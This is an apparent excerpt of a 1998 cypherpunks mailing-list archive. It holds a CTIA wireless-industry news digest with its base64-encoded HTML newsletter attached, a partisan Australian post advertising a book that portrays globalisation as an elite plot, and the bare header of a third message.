Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

The Newest Most Comprehensive Tradeshow of Wireless 
Computing and Communications is Only a Month Away. 
Register TODAY!
http://www.wirelessit.com/register.htm

Team WOW-COM
wowcom@ctia.org
===========================================
 





--Boundary..3996.1071713805.multipart/mixed
Content-Type: application/octet-stream; name="bin00018.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00018.bin"
Content-Description: "CTIA_Daily_News_19980915.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9wcm9mZXNzaW9uYWwvY29udmVudGlvbi93c2VjdXJpdHkvaW5k
ZXguY2ZtIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9pbWFn
ZXMvcHJvZmVzc2lvbmFsL2NvbnZlbnRpb24vd3NlY3VyaXR5OTguZ2lmIiBB
TFQ9IlRvZGF5J3MgTmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgU0VDVVJJ
VFkgOTgiIE5PU0FWRSBCT1JERVI9MCBIRUlHSFQ9NzUgV0lEVEg9MTc1Pjwv
QT48L0NFTlRFUj4KPC9URD4KPC9UUj4KPC9UQUJMRT48L0NFTlRFUj4KCjxD
RU5URVI+Jm5ic3A7PC9DRU5URVI+Cgo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9
MCBXSURUSD0iNjAwIiA+CjxUUiBCR0NPTE9SPSIjMDAwMDk5Ij4KPFREPjwv
VEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBDT0xPUj0iI0NDQ0NDQyI+PEZPTlQgU0laRT0rMT5DVElBCkRhaWx5IE5l
d3MgZnJvbSBXT1ctQ09NIC0gU2VwdGVtYmVyIDE1LCAxOTk4PC9GT05UPjwv
Rk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iNTgwIj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5XaXJlbGVzcyBQQ1Mg
TGljZW5zZXMKR28gVXAgRm9yIEF1Y3Rpb248L0ZPTlQ+PC9GT05UPjwvQj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+VG9kYXkgNTQgY29tcGFuaWVz
IHdpbGwgYmlkIG9uIDkwOCBsaWNlbnNlcwpiZWluZyBvZmZlcmVkIGJ5IHRo
ZSBGZWRlcmFsIENvbW11bmljYXRpb25zIENvbW1pc3Npb24uICg8QSBIUkVG
PSJodHRwOi8vd3d3LmJvc3Rvbi5jb20vZGFpbHluZXdzL3dpcmVodG1sLzI1
OC9XaXJlbGVzc19saWNlbnNlc19nb191cF9mb3JfYXVjdGlvbi5zaHRtbCI+
Qk9TVE9OPC9BPikKKDxBIEhSRUY9Imh0dHA6Ly93d3cudGVsZWRvdGNvbS5j
b20vbmV3czA5OTgvbmV3czA5MTQ5OF8xLmh0bWwiPlRFTEUuQ09NPC9BPik8
L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05U
IFNJWkU9KzE+Tm9raWEgRGVtb25zdHJhdGVzIEdTTQpNb2JpbGUgTmV0d29y
azwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij5GaW5sYW5kJ3MgTm9raWEgT3kgc2hvd2VkIEdTTSBtb2JpbGUgbmV0d29y
awpvcGVyYXRvcnMgaG93IHRoZXkgY2FuIGJvb3N0IHRoZWlyIGRhdGEgdHJh
bnNtaXNzaW9uIHNwZWVkcyB0byBhbG1vc3QgNjAKa2lsb2JpdHMgcGVyIHNl
Y29uZCB5ZXN0ZXJkYXkuICg8QSBIUkVGPSJodHRwOi8vd3d3LnRvdGFsdGVs
ZS5jb20vY2dpLWJpbi9uZXdzLmNnaS8xOTAzMy93b3JsZG1vcmUuaHRtbCI+
VE9UQUw8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0rMT5MdWNlbnQgQW5ub3VuY2VzIEEgTmV3CkNo
aXAgUHJvZHVjdGlvbiBUZWNobmlxdWUgZm9yIFdpcmVsZXNzIFBob25lczwv
Rk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5U
aGUgbmV3IHByb2R1Y3Rpb24gcHJvY2VzcyB3aWxsIG1ha2Ugc2luZ2xlLWNo
aXAKd2lyZWxlc3MgcGhvbmVzIHBvc3NpYmxlIGZvciB0aGUgZmlyc3QgdGlt
ZSBhbmQgaXMgZXhwZWN0ZWQgdG8gZXh0ZW5kIGJhdHRlcnkKbGlmZS4gKDxB
IEhSRUY9Imh0dHA6Ly93d3cud2lyZWQuY29tL25ld3MvbmV3cy90ZWNobm9s
b2d5L3N0b3J5LzE1MDA5Lmh0bWwiPldJUkVEPC9BPik8L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+Q2ll
bmEgYW5kIFRlbGxhYnMgQ2FsbApPZmYgTWFycmlhZ2U8L0ZPTlQ+PC9GT05U
PjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+VGVsbGFicyBlbmRz
IGl0cyBwbGFuIHRvIHBheSAkNyBiaWxsaW9uCmZvciBDaWVuYS4gKDxBIEhS
RUY9Imh0dHA6Ly93d3cudGVsZWRvdGNvbS5jb20vbmV3czA5OTgvbmV3czA5
MTQ5OF8zLmh0bWwiPlRFTEUuQ09NPC9BPikKKDxBIEhSRUY9Imh0dHA6Ly93
d3cud2FzaGluZ3RvbnBvc3QuY29tL3dwLXNydi93YXNodGVjaC9sb25ndGVy
bS9jaWVuYS9lbXBsb3llZXMwOTE1OTguaHRtIj5XQVNIUE9TVDwvQT4pCig8
QSBIUkVGPSJodHRwOi8vd3d3LmxhdGltZXMuY29tL0hPTUUvTkVXUy9CVVNJ
TkVTUy90MDAwMDgzODM1LjEuaHRtbCI+TEFUSU1FUzwvQT4pPC9GT05UPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJS
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsx
PklCTSBDb25maXJtcyBQbGFucyB0bwpTZWxsIEdsb2JhbCBOZXR3b3JrPC9G
T05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkJp
ZyBCbHVlIGlzIHNob3BwaW5nIGFyb3VuZCBmb3IgYSB0ZWxlY29tbXVuaWNh
dGlvbnMKYnV5ZXIgZm9yIGl0cyBHbG9iYWwgTmV0d29yay4gKDxBIEhSRUY9
Imh0dHA6Ly93d3cudGVsZWRvdGNvbS5jb20vbmV3czA5OTgvbmV3czA5MTQ5
OF80Lmh0bWwiPlRFTEUuQ09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+QVQmYW1wO1QgUmVh
ZGllcyBPY3RvYmVyCkxhdW5jaCBmb3IgSGlnaC1TcGVlZCBNdWx0aW1lZGlh
IE5ldHdvcms8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+QVQmYW1wO1QgQ29ycG9yYXRpb24ncyBuZXcgaGlnaC1zcGVl
ZAptdWx0aW1lZGlhIG5ldHdvcmsgY2FsbGVkIEludGVncmF0ZWQgTmV0d29y
ayBDb25uZWN0LCBrbm93biBmb3IgaXRzIGFiaWxpdHkKdG8gY2FycnkgbXVs
dGlwbGUgdHJhZmZpYyB0eXBlcyBhbmQgcXVhbGl0eSBvZiBzZXJ2aWNlLCB3
aWxsIGJlIGFubm91bmNlZApvbiBPY3RvYmVyIDFzdC4gKDxBIEhSRUY9Imh0
dHA6Ly93d3cuemRuZXQuY29tL2ludHdlZWsvZGFpbHkvOTgwOTE0by5odG1s
Ij5aRE5FVDwvQT4pCig8QSBIUkVGPSJodHRwOi8vd3d3LnRlY2h3ZWIuY29t
L3dpcmUvc3RvcnkvVFdCMTk5ODA5MTRTMDAxNSI+VEVDSFdFQjwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPSsxPlNORVQgUmVhY2hlcyBUZW50YXRpdmUKQWdyZWVtZW50IFdpdGgg
VW5pb247IFN0cmlrZSBFbmQgSXMgaW4gU2lnaHQ8L0ZPTlQ+PC9GT05UPjwv
Qj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+KDxBIEhSRUY9Imh0dHA6
Ly9pbnRlcmFjdGl2ZS53c2ouY29tL2FydGljbGVzL1NCOTA1ODQ4NDU0Mjk4
ODk4NTAwLmh0bSI+V1NKPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+RkNDIEFwcHJvdmVzIFdv
cmxkQ29tLU1DSQpNZXJnZXI8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+RmVkZXJhbCBDb21tdW5pY2F0aW9ucyBDb21t
aXNzaW9uIENoYWlybWFuCldpbGxpYW0gS2VubmFyZCBwcmVkaWN0cyBubyBt
b3JlICJtZWdhLW1lcmdlcnMgZm9yIHRoZSBuZWFyIGZ1dHVyZS4gKDxBIEhS
RUY9Imh0dHA6Ly93d3cubmV3cy5jb20vTmV3cy9JdGVtLzAsNCwyNjM2NSww
MC5odG1sP3N0Lm5lLjQuaGVhZCI+TkVXUzwvQT4pCig8QSBIUkVGPSJodHRw
Oi8vd3d3Lndhc2hpbmd0b25wb3N0LmNvbS93cC1zcnYvV1BsYXRlLzE5OTgt
MDkvMTUvMDU5bC0wOTE1OTgtaWR4Lmh0bWwiPldBU0hQT1NUPC9BPikKKDxB
IEhSRUY9Imh0dHA6Ly93d3cudXNhdG9kYXkuY29tL2xpZmUvY3liZXIvdGVj
aC9jdGQ0NjguaHRtIj5VU0FUT0RBWTwvQT4pCig8QSBIUkVGPSJodHRwOi8v
d3d3LmxhdGltZXMuY29tL0hPTUUvTkVXUy9CVVNJTkVTUy90MDAwMDgzODQx
LjEuaHRtbCI+TEFUSU1FUzwvQT4pCig8QSBIUkVGPSJodHRwOi8vd3d3Lndp
cmVkLmNvbS9uZXdzL25ld3MvYnVzaW5lc3Mvc3RvcnkvMTUwMTEuaHRtbCI+
V0lSRUQ8L0E+KQooPEEgSFJFRj0iaHR0cDovL3d3dy5jbm5mbi5jb20vaG90
c3Rvcmllcy9kZWFscy85ODA5LzE0L21jaS8iPkNOTjwvQT4pCig8QSBIUkVG
PSJodHRwOi8vd3d3Lm55dGltZXMuY29tL2xpYnJhcnkvdGVjaC85OC8wOS9i
aXp0ZWNoL2FydGljbGVzLzE1bWVyZ2VyLmh0bWwiPk5ZVElNRVM8L0E+KTwv
Rk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0rMT5GQ0MgRGVsYXlzIFdpcmV0YXAgRGVhZGxpbmU8L0ZPTlQ+PC9G
T05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+VGhlIGRlbGF5
IGZyb20gT2N0LiAyOCwgMTk5OCwgdG8gSnVuZQozMCwgMjAwMCwgd2lsbCBz
bG93IHRoZSBGQkkncyBhYmlsaXR5IHRvIHdpcmV0YXAgcGhvbmVzIHdpdGgg
ZGlnaXRhbCB0ZWNobm9sb2d5LgooPEEgSFJFRj0iaHR0cDovL3d3dy50ZWNo
d2ViLmNvbS93aXJlL3N0b3J5L1RXQjE5OTgwOTE0UzAwMTMiPlRFQ0hXRUI8
L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
PEZPTlQgU0laRT0rMT5Ob3J0aGVybiBUZWxlY29tIFBsYW5uaW5nCnRvIEN1
dCAzLDUwMCBKb2JzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPk5vcnRoZXJuIFRlbGVjb20gYW5ub3VuY2VkIHRoYXQg
aXQgd291bGQKbGF5IG9mZiAzLDUwMCB3b3JrZXJzLCB0aGUgZXF1aXZhbGVu
dCBvZiBhYm91dCA0IHBlcmNlbnQgb2YgaXRzIGludGVybmF0aW9uYWwKd29y
ayBmb3JjZS4gKDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20vcmVz
dWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9mcmFtZWluZGV4LmNmbT9hcnRpY2xl
aWQ9MzQxMyI+V09XLUNPTTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlNDQyBDb21tdW5pY2F0
aW9ucyBJbnRyb2R1Y2VzCjktMS0xIFNvbHV0aW9uIGZvciBXaXJlbGVzcyBM
b2NhbCBMb29wIFRlY2hub2xvZ3k8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+TGlua2luZyBMb2NhbCBMb29wIGFuZCA5
LTEtMSBjb25uZWN0aW9ucwpzZWVuIGFzIGF0dHJhY3RpdmUgZm9yIHN1YnNj
cmliZXJzLiAoPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1
bHRzL3Byb2Zlc3Npb25hbC9uZXdzL2ZyYW1laW5kZXguY2ZtP2FydGljbGVp
ZD0zNDE0Ij5XT1ctQ09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+U3QuIExvdWlzIEN1c3Rv
bWVycyBTZWVuCkFiYW5kb25pbmcgV2lyZWxpbmUgZm9yIFdpcmVsZXNzPC9G
T05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPldp
cmVsZXNzIHVzYWdlIGlzIHVwIGFuZCBtb3JlIGN1c3RvbWVycwphcmUgdHVy
bmluZyB0byB0aGUgd2lyZWxlc3MgcGhvbmUgaW5kdXN0cnkgZm9yIGV4Y2x1
c2l2ZSBzZXJ2aWNlICg8QSBIUkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29t
L3Jlc3VsdHMvcHJvZmVzc2lvbmFsL25ld3MvZnJhbWVpbmRleC5jZm0/YXJ0
aWNsZWlkPTM0MTUiPldPVy1DT008L0E+KTwvRk9OVD48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5Sb2dlcnMgQ2Fu
dGVsICJQYXkgQXMKWW91IEdvIiBQcm9kdWN0cyB0byBCZSBTb2xkIGF0IERy
dWcgU3RvcmUgQ2hhaW48L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+Um9nZXJzIENhbnRlbCBNb2JpbGUgQ29tbXVuaWNh
dGlvbnMgYW5ub3VuY2VkCnRoYXQgaXRzIHByZXBhaWQgUGF5IEFzIFlvdSBH
byBjZWxsdWxhciBhbmQgcGFnaW5nIHByb2R1Y3RzIHdpbGwgbm93IGJlCmF2
YWlsYWJsZSBhdCBTaG9wcGVycyBEcnVnIE1hcnQgb3V0bGV0cyAoPEEgSFJF
Rj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3Byb2Zlc3Npb25h
bC9uZXdzL2ZyYW1laW5kZXguY2ZtP2FydGljbGVpZD0zNDE4Ij5XT1ctQ09N
PC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PjxGT05UIFNJWkU9KzE+UmVzY3VlcnMgU2F2ZSBEdWNrIEh1bnRlcgo+RnJv
bSBNdWQgRmxhdHM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+QSBjZWxsdWxhciBwaG9uZSB3YXMgdXNlZCB0byBoZWxw
IHJlc2N1ZQphbiBBbmNob3JhZ2UsIEFsYS4sIGh1bnRlciB3aG8gd2FzIHN0
dWNrIGluIHRoZSBUdXJuYWdhaW4gQXJtIG11ZCBmbGF0cwpmb3IgdHdvIGhv
dXJzLiZuYnNwOyBBIGNvbXBhbmlvbiBvZiB0aGUgdHJhcHBlZCBodW50ZXIt
LXdobyB3YXMgc3Vja2VkCmludG8gdGhlIHF1aWNrc2FuZC1saWtlIG11ZCB1
cCB0byBoaXMga25lZXMtLXVzZWQgYSZuYnNwOzwvRk9OVD4KPEJSPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+Y2VsbHVsYXIgcGhvbmUgdG8gY2Fs
bCBmb3IgaGVscC4mbmJzcDsKKDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNv
bS5jb20vcmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9mcmFtZWluZGV4LmNm
bT9hcnRpY2xlaWQ9MzQxOSI+V09XLUNPTTwvQT4pPC9GT05UPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURU
SD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJ
WkU9LTE+Rm9yIGFkZGl0aW9uYWwgbmV3cyBhYm91dAp0aGUgd2lyZWxlc3Mg
aW5kdXN0cnktLWluY2x1ZGluZyBwZXJpb2RpYyBuZXdzIHVwZGF0ZXMgdGhy
b3VnaG91dCB0aGUgZGF5LS12aXNpdAo8QSBIUkVGPSJodHRwOi8vd3d3Lndv
dy1jb20uY29tIj5odHRwOi8vd3d3Lndvdy1jb20uY29tLjwvQT48L0ZPTlQ+
PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPjxGT05UIFNJWkU9LTE+Q1RJQSBEYWlseSBOZXdzIGZyb20gV09X
LUNPTQppcyB0cmFuc21pdHRlZCB3ZWVrZGF5cywgZXhjZXB0IGZvciBob2xp
ZGF5cy4gVmlzaXQgdXMgb24gdGhlIFdvcmxkIFdpZGUKV2ViIGF0IDxBIEhS
RUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20vcHJvZmVzc2lvbmFsIj5odHRw
Oi8vd3d3Lndvdy1jb20uY29tL3Byb2Zlc3Npb25hbDwvQT4uJm5ic3A7PC9G
T05UPjwvRk9OVD4mbmJzcDsKCjxQPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0tMT5JZiB5b3UgYXJlIG5vdCBpbnRlcmVzdGVk
CmluIHJlY2VpdmluZyB0aGUgQ1RJQSBEYWlseSBOZXdzIGZyb20gV09XLUNP
TSwgcGxlYXNlIHNlbmQgYSBtZXNzYWdlIHRvCjxBIEhSRUY9Im1haWx0bzp1
bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0eW1haWwuY29tIj51bmpv
aW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0eW1haWwuY29tPC9BPi4mbmJz
cDs8L0ZPTlQ+PC9GT05UPiZuYnNwOwoKPFA+PEI+KioqPEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPiBUaGUgdGVybSAidW5q
b2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5pdHltYWlsLmNvbSIKbXVzdCBi
ZSBsaXN0ZWQgaW4gdGhlIFRPIHNlY3Rpb24gb2YgdGhlIGVtYWlsLjwvRk9O
VD48L0ZPTlQ+ICoqKjwvQj4mbmJzcDsKCjxQPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5QbGVhc2UgTm90ZTogU29tZSBv
ZiB0aGUKbGlua3MgaW4gdG9kYXkncyBuZXdzIGFyZSB0aW1lIHNlbnNpdGl2
ZS4mbmJzcDsgVGhvc2UgbGlua3MgbWF5IG5vdCBiZQphdmFpbGFibGUgYXMg
bmV3cyBjaGFuZ2VzIHRocm91Z2hvdXQgdGhlIGRheS4mbmJzcDsgQWxzbywg
c29tZSBuZXdzIHNvdXJjZXMKbWF5IGJlIHN1YnNjcmlwdGlvbi1iYXNlZCBv
ciByZXF1aXJlIHJlZ2lzdHJhdGlvbi48L0ZPTlQ+PC9GT05UPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURU
SD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RSPgo8L1RBQkxFPjwvQ0VO
VEVSPgoKPENFTlRFUj4mbmJzcDs8L0NFTlRFUj4KCjwvQk9EWT4KPC9IVE1M
Pgo=
--Boundary..3996.1071713805.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Balson" <mb2657b@enterprise.powerup.com.au>
Date: Tue, 15 Sep 1998 01:22:28 -0700 (PDT)
To: <Undisclosed.Recipients>
Subject: Globalisation: Demise of the Australian nation
Message-ID: <001301bde082$20436560$f81c64cb@QU.fox.uq.net.ai>
MIME-Version: 1.0
Content-Type: text/plain





New book: 'GLOBALISATION: DEMISE OF THE AUSTRALIAN NATION'. 
 
This is Graham Strachan's follow-up to his controversial sellout success, 
'Economic Rationalism: a Disaster for Australia'. (See articles at: <A 
href="http://www.gwb.com.au/gwb/news/economic">http://www.gwb.com.au/gwb/news/economic)
 
We recommend it to those who are concerned about where Australia will be, 
and has been going under the Laboral factions (Labor and Coalition parties) for 
the last 20 PLUS years.
 
Globalisation is no longer a conspiracy theory: it is official Government 
(and Opposition) policy! The only secret now is just what 'globalisation' 
means.According to the power elites it involves 'trade liberalisation' 
and that's it. In fact it goes far beyond that, and includes political and 
social globalisation as well. This book explains how it is all being engineered 
behind a screen of lies and half truths by dishonest politicians, corrupt media, 
and treacherous elites in business, government bureaucracies, academia and the 
churches, with the aid of false economic and social theories. While it 
concentrates on economic deceit, this book goes on to uncover the complete 
globalisation programme. The real nature of Globalism might surprise 
you!At $15 plus $2.50 postage (with discounts on both book and postage 
for larger orders) every Australian must read this book. Ordering details at 
Graham's website: <A 
href="http://www.overflow.net.au/~bizbrief">http://www.overflow.net.au/~bizbrief.
 
GWB
 
 
Scott Balson
Pauline Hanson's One Nation 
webmaster


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jeff206@juno.com
Date: Wed, 16 Sep 1998 00:44:54 -0700 (PDT)
Subject: Titanic
